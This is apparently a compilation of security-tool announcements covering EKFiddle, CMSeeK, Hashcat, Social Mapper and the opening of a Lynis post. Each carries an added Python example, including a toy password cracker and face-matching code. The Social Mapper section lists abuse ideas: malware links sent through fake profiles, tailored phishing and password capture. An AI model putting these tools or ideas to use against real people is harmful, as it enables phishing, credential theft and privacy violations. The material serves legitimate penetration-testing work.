Allows you to identify the sequence of events between sessions. Right-click on the session you are interested in retracing your steps to and simply 'connect the dots'. It will label the sequence of events from 01 to n within the comments column. You can reorder that column to have a condensed view of the sequence.

Crawler
Load a list of URLs from a text file and let the browser automatically visit them.
Tools -> Crawler (experimental) -> Start crawler
May require some tweaks in your browser's settings, in particular with regards to crash recovery:
IE: not needed
Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes
Chrome: not needed
Edge: fix already included

Uninstalling EKFiddle
Delete CustomRules.cs

Download EKFiddle
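The logic behind the Run Regexes, Calculate MD5/SHA256 hash and Extract IOCs actions, as an added example in Python over an in-memory capture; this is not EKFiddle's CustomRules.cs, which is C# running inside Fiddler. The three rules, their labels, the session records and the URLs in them are constructed for the example; EKFiddle's real master regex list is fetched from GitHub and is not reproduced here.

```python
"""Added example, not EKFiddle's own code: run regex rules over captured
sessions, hash the response bodies, and emit IOC lines for the hits.

Assumptions (constructed): RULES and SESSIONS below, including every host,
IP, URI and body they contain.
"""
import hashlib
import re
from typing import Dict, List

# Constructed rules: (label written to the Comments column, field to inspect, pattern).
RULES = [
    ("Fake_Flash_Update",    "uri",  r"/(?:flash|adobe)[_-]?(?:player|update)[^/]*\.exe$"),
    ("EK_Landing_Style_URI", "uri",  r"\?[a-z]{4,8}=\d{5,}&[a-z]{2,4}=[A-Za-z0-9]{12,}$"),
    ("Obfuscated_JS",        "body", r"eval\(\s*unescape\("),
]

# Constructed sessions.  'body' is the decoded response body (run "Remove encoding"
# first in Fiddler, otherwise you hash and grep gzip bytes).
SESSIONS = [
    {"id": 1, "host": "cdn.example.net", "ip": "203.0.113.10",
     "uri": "http://cdn.example.net/js/jquery.min.js", "body": "/*! jQuery */ (function(){})();"},
    {"id": 2, "host": "update-flash.example", "ip": "198.51.100.7",
     "uri": "http://update-flash.example/download/flash_player_update.exe", "body": "MZ\x90\x00constructed"},
    {"id": 3, "host": "land.example", "ip": "203.0.113.55",
     "uri": "http://land.example/index.php?vwbxq=483920&ab=Qm9yaW5nU3RyaW5n",
     "body": "<script>eval(unescape('%66%75%6e%63'))</script>"},
]


def run_regexes(sessions: List[dict], rules=RULES) -> Dict[int, List[str]]:
    """{session id: [matching rule labels]}, the marking EKFiddle writes as comments/colours."""
    marks: Dict[int, List[str]] = {}
    for s in sessions:
        for label, field, pattern in rules:
            if re.search(pattern, s[field], re.I):
                marks.setdefault(s["id"], []).append(label)
    return marks


def body_hashes(session: dict) -> Dict[str, str]:
    """MD5 and SHA256 of the (decoded) body, the values you would look up on VT / Hybrid Analysis."""
    raw = session["body"].encode("utf-8", "surrogateescape")
    return {"md5": hashlib.md5(raw).hexdigest(), "sha256": hashlib.sha256(raw).hexdigest()}


def extract_iocs(sessions: List[dict], marks: Dict[int, List[str]]) -> List[str]:
    """One line per flagged session: host, IP, URI, SHA256, comment."""
    lines = []
    for s in sessions:
        if s["id"] in marks:
            lines.append(",".join([s["host"], s["ip"], s["uri"],
                                   body_hashes(s)["sha256"], ";".join(marks[s["id"]])]))
    return lines


if __name__ == "__main__":
    marks = run_regexes(SESSIONS)
    for line in extract_iocs(SESSIONS, marks):
        print(line)
```

The rules are anchored to the end of the URI and to literal code fragments on purpose: a loose pattern such as `\.exe` would flag every legitimate download in the capture and drown the one that matters.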

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

CMSeeK v1.0.7 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 50 Other CMSs)

What is a CMS?

A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla and Drupal.

Release History
- Version 1.0.7 [07-08-2018]
- Version 1.0.6 [23-07-2018]
- Version 1.0.5 [19-07-2018]
- Version 1.0.4 [17-07-2018]
- Version 1.0.3 [06-07-2018]
- Version 1.0.2 [06-07-2018]
- Version 1.0.1 [19-06-2018]
- Version 1.0.0 [15-06-2018]
Changelog File

Functions of CMSeeK:
- Basic CMS detection of over 30 CMSs
- Drupal version detection
- Advanced WordPress scans: detects version, user enumeration, plugins enumeration, theme enumeration, detects users (3 detection methods), looks for version vulnerabilities and much more!
- Advanced Joomla scans: version detection, backup files finder, admin page finder, core vulnerability detection, directory listing check, config leak detection, various other checks
- Modular bruteforce system: use pre-made bruteforce modules or create your own and integrate them with it

Requirements and Compatibility:

CMSeeK is built using python3; you will need python3 to run this tool, and it is compatible with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update, so make sure git is installed.

Installation and Usage:

It is fairly easy to use CMSeeK. Just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:

    git clone https://github.com/Tuhinshubhra/CMSeeK
    cd CMSeeK

For guided scanning:

    python3 cmseek.py

Else:

    python3 cmseek.py -u [...]

Help menu from the program:

    USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>

    SPECIFYING TARGET:
      -u URL, --url URL          Target Url
      -l LIST, --list LIST       path of the file containing list of sites for multi-site scan (comma separated)

    USER AGENT:
      -r, --random-agent         Use a random user agent
      --user-agent USER_AGENT    Specify custom user agent

    OUTPUT:
      -v, --verbose              Increase output verbosity

    VERSION & UPDATING:
      --update                   Update CMSeeK (Requires git)
      --version                  Show CMSeeK version and exit

    HELP & MISCELLANEOUS:
      -h, --help                 Show this help message and exit
      --clear-result             Delete all the scan result

    EXAMPLE USAGE:
      python3 cmseek.py -u example.com                         # Scan example.com
      python3 cmseek.py -l /home/user/target.txt               # Scan the sites specified in target.txt (comma separated)
      python3 cmseek.py -u example.com --user-agent Mozilla 5.0    # Scan example.com using custom user-Agent (Mozilla 5.0 is used here)
      python3 cmseek.py -u example.com --random-agent          # Scan example.com using a random user-Agent
      python3 cmseek.py -v -u example.com                      # enabling verbose output while scanning example.com

Checking For Update:

You can check for an update either from the main menu or use python3 cmseek.py --update to check for an update and apply the auto update. P.S: Please make sure you have git installed, CMSeeK uses git to apply the auto update.

Detection Methods:

CMSeeK detects the CMS via the following:
- HTTP headers
- Generator meta tag
- Page source code
- robots.txt

Supported CMSs:

CMSeeK currently can detect 40 CMSs; you can find the list in the cmss.py file, which is present in the cmseekdb directory. All the CMSs are stored in the following way:

    cmsID = {
        'name': 'Name Of CMS',
        'url': 'Official URL of the CMS',
        'vd': 'Version Detection (0 for no, 1 for yes)',
        'deeps': 'Deep Scan (0 for no 1 for yes)'
    }

Scan Result:

All of your scan results are stored in a json file named cms.json; you can find the logs inside the Result\<Target Site> directory. As for the bruteforce results, they're stored in a txt file under the site's result directory as well.

Bruteforce Modules:

CMSeeK has a modular bruteforce system, meaning you can add your custom made bruteforce modules to work with cmseek. Proper documentation for creating modules will be created shortly, but in case you already figured out how to (pretty easy once you analyze the pre-made modules), all you need to do is this:
1. Add a comment exactly like this: # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex.
2. Add another comment: ### cmseekbruteforcemodule. This will help CMSeeK to know it is a module.
3. Copy and paste the module into the brutecms directory under CMSeeK's directory.
4. Open CMSeeK and Rebuild Cache using U as the input in the first menu.
If everything is done right, your module will be listed in the bruteforce menu the next time you open CMSeeK.

Need More Reasons To Use CMSeeK?

If nothing else, you can always enjoy exiting CMSeeK (please don't); it will bid you goodbye with a random goodbye message in various languages. Also, you can try reading the comments in the code; those are pretty random and weird!!!

Download CMSeeK
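The four detection sources listed above (HTTP headers, generator meta tag, page source, robots.txt), as an added example applied to an in-memory response; this is not CMSeeK's own code or detection database. The registry follows the cmss.py entry layout quoted above ('name', 'url', 'vd', 'deeps'), but its three entries, every signature regex and the sample responses are constructed for this example.

```python
"""Added example, not CMSeeK's own code: fingerprint a CMS from headers,
generator tag, page source and robots.txt, then pull a version where the
registry says version detection ('vd') is possible.

Assumptions (constructed): the CMSS entries, SIGNATURES and SAMPLES below.
"""
import re
from typing import Dict, Optional

CMSS = {   # cmsID -> entry, in the cmss.py layout quoted above
    "wp":   {"name": "WordPress", "url": "https://wordpress.org",  "vd": "1", "deeps": "1"},
    "joom": {"name": "Joomla",    "url": "https://www.joomla.org", "vd": "1", "deeps": "1"},
    "dru":  {"name": "Drupal",    "url": "https://www.drupal.org", "vd": "1", "deeps": "0"},
}

# Constructed signatures: (cmsID, source, pattern).  Strongest source first, so a
# server-set header or a generator tag beats a path fragment any theme could reuse.
SIGNATURES = [
    ("dru",  "headers",   r"^x-generator:\s*drupal"),
    ("dru",  "headers",   r"^x-drupal-cache:"),
    ("wp",   "generator", r"^wordpress"),
    ("joom", "generator", r"^joomla"),
    ("dru",  "generator", r"^drupal"),
    ("wp",   "body",      r"/wp-content/|/wp-includes/"),
    ("joom", "body",      r"/media/jui/|/components/com_"),
    ("dru",  "body",      r"/sites/default/files/|drupalsettings"),
    ("wp",   "robots",    r"^disallow:\s*/wp-admin/"),
    ("joom", "robots",    r"^disallow:\s*/administrator/"),
    ("dru",  "robots",    r"^disallow:\s*/core/"),
]

GENERATOR_TAG = re.compile(
    r'<meta[^>]*\bname=["\']generator["\'][^>]*\bcontent=["\']([^"\']*)["\']', re.I)
VERSION = re.compile(r"\d+(?:\.\d+)*")


def generator_tag(body: str) -> str:
    """Value of <meta name="generator" content="..."> (name-before-content order), else ''."""
    m = GENERATOR_TAG.search(body)
    return m.group(1) if m else ""


def detect_version(header_text: str, generator: str) -> str:
    """First version-looking token in the generator tag or an X-Generator header, else ''."""
    xgen = re.search(r"^x-generator:\s*(.+)$", header_text, re.I | re.M)
    for text in (generator, xgen.group(1) if xgen else ""):
        m = VERSION.search(text)
        if m:
            return m.group(0)
    return ""


def detect(headers: Dict[str, str], body: str, robots: str = "") -> Optional[dict]:
    """Registry entry for the first signature that matches, with 'matched_on' and 'version' added."""
    sources = {
        "headers": "\n".join(f"{k.lower()}: {v}" for k, v in headers.items()),
        "generator": generator_tag(body),
        "body": body,
        "robots": robots,
    }
    for cms_id, source, pattern in SIGNATURES:
        if re.search(pattern, sources[source], re.I | re.M):
            hit = dict(CMSS[cms_id], id=cms_id, matched_on=source)
            hit["version"] = detect_version(sources["headers"], sources["generator"]) if hit["vd"] == "1" else ""
            return hit
    return None


# Constructed responses: (headers, body, robots.txt).
SAMPLES = {
    "wordpress": ({"Server": "nginx"},
                  '<html><head><meta name="generator" content="WordPress 4.9.8" />'
                  '<link rel="stylesheet" href="/wp-content/themes/x/style.css"></head></html>',
                  "User-agent: *\nDisallow: /wp-admin/\n"),
    "drupal": ({"Server": "Apache", "X-Generator": "Drupal 8 (https://www.drupal.org)"},
               "<html><body>hello</body></html>", ""),
    "joomla": ({"Server": "Apache"},
               '<html><head><meta name="generator" content="Joomla! - Open Source Content Management" /></head></html>', ""),
    "plain": ({"Server": "Apache"}, "<html><body>static</body></html>", ""),
}

if __name__ == "__main__":
    for label, (headers, body, robots) in SAMPLES.items():
        print(label, "->", detect(headers, body, robots))
```

Two things the ordering buys you: a site that strips its generator tag is still caught by the weaker path signatures, and a site that merely hot-links a /wp-content/ image from elsewhere does not get called WordPress when a header or generator tag says otherwise.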

Link: http://feedproxy.google.com/~r/PentestTools/~3/vbiJSfGmARQ/cmseek-v107-cms-detection-and.html

Hashcat v4.2.1 – World’s Fastest and Most Advanced Password Recovery Utility

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation

Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

GPU Driver requirements:
AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
NVIDIA GPUs require "NVIDIA Driver" (367.x or later)

Features
World's fastest password cracker
World's first and only in-kernel rule engine
Free
Open-Source (MIT License)
Multi-OS (Linux, Windows and OSX)
Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
Multi-Hash (Cracking multiple hashes at the same time)
Multi-Devices (Utilizing multiple devices in same system)
Multi-Device-Types (Utilizing mixed device types in same system)
Supports distributed cracking networks (using overlay)
Supports interactive pause / resume
Supports sessions
Supports restore
Supports reading password candidates from file and stdin
Supports hex-salt and hex-charset
Supports automatic performance tuning
Supports automatic keyspace ordering markov-chains
Built-in benchmarking system
Integrated thermal watchdog
200+ Hash-types implemented with performance in mind
... and much more

Algorithms
MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-224
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
BLAKE2b-512
SipHash
Skip32
RIPEMD-160
Whirlpool
DES (PT = $salt, key = $pass)
3DES (PT = $salt, key = $pass)
ChaCha20
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5($salt.$pass.$salt)
md5($salt.md5($pass))
md5($salt.md5($salt.$pass))
md5($salt.md5($pass.$salt))
md5(md5($pass))
md5(md5($pass).md5($salt))
md5(strtoupper(md5($pass)))
md5(sha1($pass))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(sha1($pass))
sha1($salt.sha1($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha1(CX)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF (Simple Machines Forum)
vBulletin
IPB (Invision Power Board)
WBB (Woltlab Burning Board)
osCommerce
xt:Commerce
PrestaShop
MediaWiki B type
WordPress
Drupal 7
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
Episerver
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
CRAM-MD5
MySQL CRAM (SHA1)
PostgreSQL CRAM (MD5)
SIP digest authentication (MD5)
WPA/WPA2
WPA/WPA2 PMK
NetNTLMv1
NetNTLMv1+ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Kerberos 5 TGS-REP etype 23
Netscape LDAP SHA/SSHA
FileZilla Server
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
DPAPI masterkey file v1 and v2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
macOS v10.4
macOS v10.5
macOS v10.6
macOS v10.7
macOS v10.8
macOS v10.9
macOS v10.10
iTunes backup < 10.0
iTunes backup >= 10.0
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA MD5
Cisco-PIX MD5
Cisco-IOS $1$ (MD5)
Cisco-IOS type 4 (SHA256)
Cisco $8$ (PBKDF2-SHA256)
Cisco $9$ (scrypt)
Juniper IVE
Juniper NetScreen/SSG (ScreenOS)
Juniper/NetBSD sha1crypt
Fortigate (FortiOS)
Samsung Android Password/PIN
Windows Phone 8+ PIN/password
GRUB 2
CRC32
RACF
Radmin2
Redmine
PunBB
OpenCart
Atlassian (PBKDF2-HMAC-SHA1)
Citrix NetScaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
PeopleSoft PS_TOKEN
Skype
WinZip
7-Zip
RAR3-hp
RAR5
AxCrypt
AxCrypt in-memory SHA1
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
MS Office <= 2003 SHA1
MS Office 2007
MS Office 2010
MS Office 2013
Lotus Notes/Domino 5
Lotus Notes/Domino 6
Lotus Notes/Domino 8
Bitcoin/Litecoin wallet.dat
Blockchain, My Wallet
Blockchain, My Wallet, V2
1Password, agilekeychain
1Password, cloudkeychain
LastPass
Password Safe v2
Password Safe v3
KeePass 1 (AES/Twofish) and KeePass 2 (AES)
JKS Java Key Store Private Keys (SHA1)
Ethereum Wallet, PBKDF2-HMAC-SHA256
Ethereum Wallet, SCRYPT
eCryptfs
Android FDE <= 4.3
Android FDE (Samsung DEK)
TrueCrypt
VeraCrypt
LUKS
Plaintext

Attack-Modes
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules

Supported OpenCL runtimes
AMD
Apple
Intel
Mesa (Gallium)
NVidia
pocl

Supported OpenCL device types
GPU
CPU
APU
DSP
FPGA
Coprocessor

Download Hashcat
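The five attack modes listed above, as an added example that is not hashcat's own code: each mode is written as a candidate generator using hashcat's mask charsets (?l ?u ?d ?s ?a) and a handful of functions from its rule language, and the candidates are checked against hashes written the way hashcat reads them for -m 0 (MD5), -m 10 (md5($pass.$salt)) and -m 20 (md5($salt.$pass)), one "hash" or "hash:salt" per line. It is pure Python and nowhere near hashcat's speed; the point is the semantics of the modes. The wordlist, rules, masks, salt and passwords below are constructed.

```python
"""Added example, not hashcat's own code: the straight, combination,
brute-force and both hybrid attack modes as candidate generators, with a
checker for the hash:salt line format of -m 0 / -m 10 / -m 20.

Assumptions (constructed): the wordlist, rules, masks, salt and passwords
used in __main__ and in the tests.
"""
import hashlib
import itertools
import string
from typing import Callable, Dict, Iterable, Iterator, List

CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def expand_mask(mask: str) -> List[str]:
    """'?u?l?d' -> one charset per position; other characters are literals; '??' is a literal '?'."""
    out, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            out.append("?" if mask[i + 1] == "?" else CHARSETS[mask[i + 1]])
            i += 2
        else:
            out.append(mask[i])
            i += 1
    return out


def apply_rule(word: str, rule: str) -> str:
    """Subset of hashcat rule functions: ':' nothing, 'l' lower, 'u' upper, 'c' capitalise,
    'r' reverse, '$X' append X, '^X' prepend X.  Functions are concatenated, e.g. 'c$1$2'."""
    i = 0
    while i < len(rule):
        f = rule[i]
        if f == ":":
            pass
        elif f == "l":
            word = word.lower()
        elif f == "u":
            word = word.upper()
        elif f == "c":
            word = word[:1].upper() + word[1:].lower()
        elif f == "r":
            word = word[::-1]
        elif f in "$^":
            i += 1
            word = word + rule[i] if f == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule function {f!r}")
        i += 1
    return word


# Attack modes, numbered as in hashcat's -a option.
def straight(words: Iterable[str], rules: Iterable[str] = (":",)) -> Iterator[str]:   # -a 0
    rules = list(rules)
    for w in words:
        for r in rules:
            yield apply_rule(w, r)


def combination(left: Iterable[str], right: Iterable[str]) -> Iterator[str]:          # -a 1
    right = list(right)
    for a in left:
        for b in right:
            yield a + b


def brute_force(mask: str) -> Iterator[str]:                                           # -a 3
    for combo in itertools.product(*expand_mask(mask)):
        yield "".join(combo)


def hybrid_wordlist_mask(words: Iterable[str], mask: str) -> Iterator[str]:            # -a 6
    return combination(words, brute_force(mask))


def hybrid_mask_wordlist(mask: str, words: Iterable[str]) -> Iterator[str]:            # -a 7
    return combination(brute_force(mask), words)


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


HASH_MODES: Dict[int, Callable[[str, str], str]] = {
    0: lambda p, salt: md5(p),            # -m 0   MD5
    10: lambda p, salt: md5(p + salt),    # -m 10  md5($pass.$salt)
    20: lambda p, salt: md5(salt + p),    # -m 20  md5($salt.$pass)
}


def crack(hash_lines: Iterable[str], mode: int, candidates: Iterable[str]) -> Dict[str, str]:
    """hash_lines are 'hash' or 'hash:salt' as hashcat reads them; returns {line: password}."""
    targets = {}
    for line in hash_lines:
        digest, _, salt = line.partition(":")
        targets[line] = (digest.lower(), salt)
    found: Dict[str, str] = {}
    for cand in candidates:
        for line, (digest, salt) in targets.items():
            if line not in found and HASH_MODES[mode](cand, salt) == digest:
                found[line] = cand
        if len(found) == len(targets):
            break
    return found


if __name__ == "__main__":
    words, salt = ["password", "summer", "admin"], "s4lt"
    targets = [md5("Summer12" + salt) + ":" + salt, md5("admin2018" + salt) + ":" + salt]
    print(crack(targets, 10, straight(words, [":", "c$1$2", "u"])))        # finds Summer12
    print(crack(targets, 10, hybrid_wordlist_mask(words, "?d?d?d?d")))     # finds admin2018
    print(crack([md5("A7x")], 0, brute_force("?u?d?l")))                  # 26*10*26 candidates
```

The same runs in hashcat itself would be `hashcat -m 10 -a 0 hashes.txt words.txt -r rules.txt`, `-a 6 hashes.txt words.txt ?d?d?d?d` and `-m 0 -a 3 hashes.txt ?u?d?l`; the mode and charset numbers above are hashcat's, only the engine is a toy.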

Link: http://feedproxy.google.com/~r/PentestTools/~3/sNwcnDbkMkE/hashcat-v421-worlds-fastest-and-most.html

Social Mapper – A Social Media Enumeration & Correlation Tool

A Social Media Mapping Tool that correlates profiles via facial recognition, by Jacob Wilkin (Greenwolf)

Social Mapper is an Open Source Intelligence tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets' names and pictures to accurately detect and group a person's presence, outputting the results into a report that a human operator can quickly review.

Social Mapper has a variety of uses in the security industry, for example the automated gathering of large numbers of social media profiles for use in targeted phishing campaigns. Facial recognition aids this process by removing false positives from the search results, so that reviewing the data is quicker for a human operator.

Social Mapper supports the following social media platforms:
- LinkedIn
- Facebook
- Twitter
- GooglePlus
- Instagram
- VKontakte
- Weibo
- Douban

Social Mapper takes a variety of input types such as:
- An organisation's name, searching via LinkedIn
- A folder full of named images
- A CSV file with names and URLs to images online

Usecases (Why you want to run this)

Social Mapper is primarily aimed at Penetration Testers and Red Teamers, who will use it to expand their target lists and find their social media profiles. From here what you do is only limited by your imagination, but here are a few ideas to get started:

(Note: Social Mapper does not perform these attacks; it gathers the data you need to perform them on a mass scale.)

- Create fake social media profiles to 'friend' the targets and send them links or malware. Recent statistics show social media users are more than twice as likely to click on links and open documents compared to those delivered via email.
- Trick users into disclosing their emails and phone numbers with vouchers and offers to make the pivot into phishing, vishing or smishing.
- Create custom phishing campaigns for each social media site, knowing that the target has an account. Make these more realistic by including their profile picture in the email. Capture the passwords for password reuse.
- View target photos looking for employee access card badges and familiarise yourself with building interiors.

Getting Started

These instructions will show you the requirements for and how to use Social Mapper.

Prerequisites

As this is a Python based tool, it should theoretically run on Linux, Mac and Windows. The main requirements are Firefox, Selenium and Geckodriver. To install the tool and set it up follow these 4 steps:

1. Install the latest version of Mozilla Firefox here: https://www.mozilla.org/en-GB/firefox/new/
2. Install the Geckodriver for your operating system and make sure it's in your path; on Mac you can place it in /usr/local/bin and on Linux in /usr/bin. You can download it here: https://github.com/mozilla/geckodriver/releases
3. Install the required Python 2.7 libraries:
   git clone https://github.com/SpiderLabs/social_mapper
   cd social_mapper/setup
   pip install -r requirements.txt
4. Provide Social Mapper with credentials to log into social media services: open social_mapper.py and enter social media credentials into the global variables at the top of the file. These credentials sit in plaintext in the script, so use dedicated accounts rather than personal ones and keep the edited file out of version control.

Using Social Mapper

Social Mapper is run from the command line using a mix of required and optional parameters. You can specify options such as input type and which sites to check, alongside a number of other parameters which affect speed and accuracy.

Required Parameters

To start up the tool 4 parameters must be provided: an input format, the input file or folder, the basic running mode, and at least one site to check.

-f, --format : Specify if the -i, --input is a 'name', 'csv', 'imagefolder' or 'socialmapper' resume file
-i, --input : The company name, a csv file, imagefolder or social mapper html file to feed into social mapper
-m, --mode : 'fast' or 'accurate'; fast skips the remaining potential targets after a first likely match is found, in some cases speeding up the program x20

Additionally at least one social media site to check must be selected by including one or more of the following:

-a, --all : Selects all of the options below and checks every site that social mapper has credentials for
-fb, --facebook : Check Facebook
-tw, --twitter : Check Twitter
-ig, --instagram : Check Instagram
-li, --linkedin : Check LinkedIn
-gp, --googleplus : Check GooglePlus
-vk, --vkontakte : Check VKontakte
-wb, --weibo : Check Weibo
-db, --douban : Check Douban

Optional Parameters

Additional optional parameters can also be set to further customise the way social mapper runs:

-t, --threshold : Customises the facial recognition threshold for matches; this can be seen as the match accuracy. Default is 'standard', but can be set to loose, standard, strict or superstrict. For example loose will find more matches, but some may be incorrect, while strict may find fewer matches but also contain fewer false positives in the final report.
-cid, --companyid : Additional parameter to add in a LinkedIn Company ID for when name searches are not picking the correct company.
-s, --showbrowser : Makes the Firefox browser visible so you can see the searches performed. Useful for debugging.
-v, --version : Display current version

Example Runs

Here are a couple of example runs to get started for differing use cases:

A quick run for Facebook and Twitter on some targets you have in an imagefolder, that you plan to manually review and don't mind some false positives:
python social_mapper.py -f imagefolder -i ./mytargets -m fast -fb -tw

An exhaustive run on a large company where false positives must be kept to a minimum:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -a -t strict

A large run that needs to be split over multiple sessions due to time, the first run doing LinkedIn and Facebook, with the second resuming and filling in Twitter, Google Plus and Instagram:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -li -fb
python social_mapper.py -f socialmapper -i ./SpiderLabs-social-mapper-linkedin-facebook.html -m accurate -tw -gp -ig

Troubleshooting

Social media sites often change their page formats and class names; if Social Mapper isn't working for you on a specific site, check out the docs section for troubleshooting advice on how to fix it. Please feel free to submit a pull request with your fixes.

Maltego

For a guide to loading your Social Mapper results into Maltego, check out the docs section.

Authors

Jacob Wilkin – Research and Development – Trustwave SpiderLabs

Download Social Mapper
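The -t threshold and -m mode options trade recall against false positives, and the interaction is easy to get wrong: fast mode can lock onto a look-alike that appears earlier in a site's results than the real account. The following is an added example, not Social Mapper's own code, showing that interaction on constructed face embeddings. Face-recognition libraries represent a face as a fixed-length vector and call two faces the same person when the Euclidean distance between vectors is under a tolerance; the numeric tolerances mapped to loose/standard/strict/superstrict here, the 4-dimensional sample vectors and the example.invalid profile URLs are all assumptions for illustration.

```python
"""Added example (not Social Mapper's code): how a facial-recognition
threshold and the fast/accurate mode interact when ranking candidate profiles.

Face-recognition libraries represent a face as a fixed-length embedding and
treat two faces as the same person when the Euclidean distance between their
embeddings is below a tolerance. The threshold names below follow Social
Mapper's -t option; the distance values mapped to them are assumptions chosen
for illustration, not the tool's values.
"""
import math

# Assumed distance tolerances: looser means more matches and more false positives.
THRESHOLDS = {
    "loose": 0.7,
    "standard": 0.6,
    "strict": 0.5,
    "superstrict": 0.4,
}


def distance(a, b):
    """Euclidean distance between two face embeddings of equal length."""
    if len(a) != len(b):
        raise ValueError("embeddings must have the same dimension")
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def match_profiles(target, candidates, threshold="standard", mode="accurate"):
    """Return (profile_url, distance) pairs whose face is within the threshold.

    candidates: list of (profile_url, embedding) in the order the site returned them.
    mode="fast": stop at the first candidate under the threshold (cheap, but keeps
                 a worse match if a better one appears later in the results).
    mode="accurate": score every candidate and return them best-first.
    """
    if mode not in ("fast", "accurate"):
        raise ValueError("mode must be 'fast' or 'accurate'")
    tol = THRESHOLDS[threshold]
    hits = []
    for url, emb in candidates:
        d = distance(target, emb)
        if d <= tol:
            hits.append((url, round(d, 3)))
            if mode == "fast":
                break
    return sorted(hits, key=lambda h: h[1])


def summarise(target, candidates):
    """Run the same candidate list under every threshold and both modes."""
    return {
        (t, m): [url for url, _ in match_profiles(target, candidates, t, m)]
        for t in THRESHOLDS
        for m in ("fast", "accurate")
    }


# Constructed sample data: 4-dimensional embeddings stand in for the 128-d
# vectors real libraries produce. The target's own photo is the reference and
# the site returned the look-alike before the real account.
TARGET = [0.10, 0.20, 0.30, 0.40]
CANDIDATES = [
    ("https://example.invalid/profile/alice-smith-2", [0.55, 0.20, 0.30, 0.40]),  # look-alike, d=0.45
    ("https://example.invalid/profile/alice-smith", [0.12, 0.18, 0.31, 0.40]),    # real account, d=0.03
    ("https://example.invalid/profile/bob-jones", [0.90, 0.90, 0.90, 0.90]),      # unrelated, d=1.32
]

if __name__ == "__main__":
    for (t, m), urls in sorted(summarise(TARGET, CANDIDATES).items()):
        print(f"{t:12s} {m:9s} -> {urls}")
```

With the sample data, standard/accurate returns the real account first and the look-alike second, standard/fast returns only the look-alike because it stops at the first hit, and superstrict drops the look-alike entirely; that is the behaviour behind the README's advice to use accurate mode with a strict threshold when false positives are costly.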

Link: http://feedproxy.google.com/~r/PentestTools/~3/ECFiCva24WU/social-mapper-social-media-enumeration.html

Lynis 2.6.7 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements we have made. There is a risk of breaking your existing configuration.

